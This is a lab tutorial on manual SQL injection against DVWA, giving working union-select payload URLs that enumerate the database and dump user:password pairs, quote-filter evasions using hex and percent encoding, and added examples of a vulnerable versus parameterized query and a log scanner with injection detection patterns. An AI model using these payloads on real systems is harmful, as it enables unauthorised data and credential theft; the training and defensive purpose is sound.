DVWA SQLi manual injection

  • Note that the injection point is string-typed (the value is wrapped in single quotes). order by 3 is then used to confirm that the query returns two columns.
    Find the database name. Note the difference between group_concat and concat: concat returns one result per row, while group_concat aggregates all of them into a single result.
    http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(schema_name) from information_schema.schemata-- &Submit=Submit#
    Or use database():
    http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(database()) -- &Submit=Submit#
  • Find the tables
    http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' -- &Submit=Submit#

  • Find the columns
    http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1 ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' -- &Submit=Submit#

  • Read the data
    0x3a is used in place of ':' so that no quoted string literal is needed as the separator.
    http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1%27%20union select 1,group_concat(user,0x3a,password) from users -- &Submit=Submit
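The four steps above all rely on the same defect: the id parameter is concatenated into the SQL text, so a single quote ends the string literal and the rest of the value becomes part of the query. The added example below is not DVWA's code or code from the original page; it models the pattern with an in-memory SQLite table (a constructed stand-in, with placeholder strings in the password column rather than real hashes) and puts the concatenated query beside the parameterized fix. The page's "read the data" payload is adapted to SQLite, whose group_concat takes one expression, so user,0x3a,password becomes user || ':' || password. Against the concatenated query the payload returns an extra row carrying every user:password pair; against the bound parameter it is compared as data and returns nothing.

```python
import sqlite3


# Constructed stand-in for the DVWA users table (in-memory SQLite, not DVWA's
# MySQL schema); the password column holds placeholder strings, not real hashes.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,"
        " user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "admin", "admin", "admin", "<hash-of-admin-password>"),
            (2, "Gordon", "Brown", "gordonb", "<hash-of-gordonb-password>"),
        ],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # The request parameter is spliced straight into the SQL text, so a quote in
    # it closes the string literal and the remainder is parsed as query syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    # Parameter binding: the value travels separately from the SQL text and can
    # only ever be compared as data, never interpreted as syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# The page's "read the data" payload, rewritten for SQLite: group_concat here
# takes a single expression, so user,0x3a,password becomes user || ':' || password.
UNION_PAYLOAD = "1' union select 1,group_concat(user || ':' || password) from users -- "


def leaked_credentials(rows):
    """Return the user:password strings present in the result rows, if any."""
    return [r[1] for r in rows if isinstance(r[1], str) and ":" in r[1]]


if __name__ == "__main__":
    db = make_db()
    print("concatenated query:", lookup_vulnerable(db, UNION_PAYLOAD))
    print("bound parameter:   ", lookup_safe(db, UNION_PAYLOAD))
```

The fix is the same in PHP, where DVWA runs: prepare the statement with a placeholder and bind the parameter, rather than quoting and escaping the value by hand.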
  • Notes
    Pattern: select ? from ? where ?
    Database names: schema_name  from information_schema.schemata
    Table names:    table_name   from information_schema.tables   where table_schema = <database>
    Column names:   column_name  from information_schema.columns  where table_name = <table>
  • Encoding tricks
    The original condition is table_name = 'users'. If single quotes are filtered, we can convert users to hexadecimal, prefix it with 0x, and run the query without any single quotes:
    http://192.168.167.207/dvwa/vulnerabilities/sqli/?id=1%27%20union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 -- &Submit=Submit

Alternatively, table_name='%75%73%65%72%73' works as well: the web server percent-decodes the parameter to 'users' before it reaches the query, so only the request itself looks different.
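Both encodings above defeat a filter that inspects the raw request: the 0x literal carries no quote at all, and the percent-encoded form only turns into 'users' after the server decodes it. The defensive consequence is that any log review or request filter has to decode the parameter first and treat MySQL hex string literals as text. The added example below (not from the original page) does that over three constructed Apache-style access-log lines that mirror the page's URLs as a browser would send them, using documentation IP addresses; the indicator patterns and the alert format are this example's own choices.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in Apache common format; the requests mirror the
# page's URLs as a browser would encode them. Not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4512',
    '192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273%20--%20&Submit=Submit HTTP/1.1" 200 4610',
    '192.0.2.10 - - [10/Oct/2023:13:55:44 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,2%20from%20information_schema.columns%20where%20table_name=%27%75%73%65%72%73%27%20--%20&Submit=Submit HTTP/1.1" 200 4610',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Every pattern is applied to the percent-decoded parameter value, so writing
# the quote as %27 or the table name as %75%73%65%72%73 does not hide it.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"\binformation_schema\b", re.I),
    "hex_literal": re.compile(r"\b0x(?:[0-9a-f]{2}){2,}\b", re.I),
    "comment_tail": re.compile(r"--\s|#"),
}


def decode_hex_literals(value):
    """Return (literal, decoded text) for each MySQL-style 0x.. string literal."""
    out = []
    for m in INDICATORS["hex_literal"].finditer(value):
        raw = bytes.fromhex(m.group(0)[2:])
        out.append((m.group(0), raw.decode("ascii", errors="replace")))
    return out


def analyze_target(target):
    """Percent-decode each query parameter and list the indicators it triggers."""
    findings = []
    # parse_qsl percent-decodes the values, which is the step a naive filter skips.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits = [k for k, rx in INDICATORS.items() if rx.search(value)]
        if hits:
            findings.append({
                "param": name,
                "decoded": value,
                "indicators": hits,
                "hex_literals": decode_hex_literals(value),
            })
    return findings


def scan_log(lines):
    """Parse each log line and keep the requests that trigger at least one indicator."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_target(m.group("target"))
        if findings:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                           "target": m.group("target"), "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        for f in alert["findings"]:
            print(alert["ts"], alert["ip"], f["param"], f["indicators"], f["hex_literals"])
            print("    decoded:", f["decoded"])
```

Only the second and third lines raise an alert; the first, a normal request, does not. On the second line the 0x7573657273 literal is reported together with its decoded value, and on the third the decoded parameter already contains 'users', which is the form a filter should be matching on.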

Reference: https://tipstrickshack.blogspot.com/2012/11/how-to-do-sql-injection-manually_7948.html
